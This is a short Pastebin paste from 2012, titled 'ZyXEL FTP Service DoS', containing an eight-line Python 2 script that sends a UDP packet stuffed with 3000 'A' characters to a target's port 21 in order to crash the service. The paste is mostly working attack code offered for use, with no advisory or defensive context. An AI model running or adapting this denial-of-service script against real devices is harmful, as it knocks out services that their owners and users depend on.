The_KGB

[Python] ZyXEL FTP Service DoS

Mar 24th, 2012
176
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 0.23 KB | None | 0 0
  1. import socket
  2. host = 'IP Target'
  3. port = 21
  4. s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  5. exploit = "A" * 3000
  6. print "Sending exploit...."
  7. pwned = "\x00\x02" + "A" + "\x00" + exploit + "\x00"
  8. s.sendto(pwned, (host, port))
Advertisement
Add Comment
Please, Sign In to add comment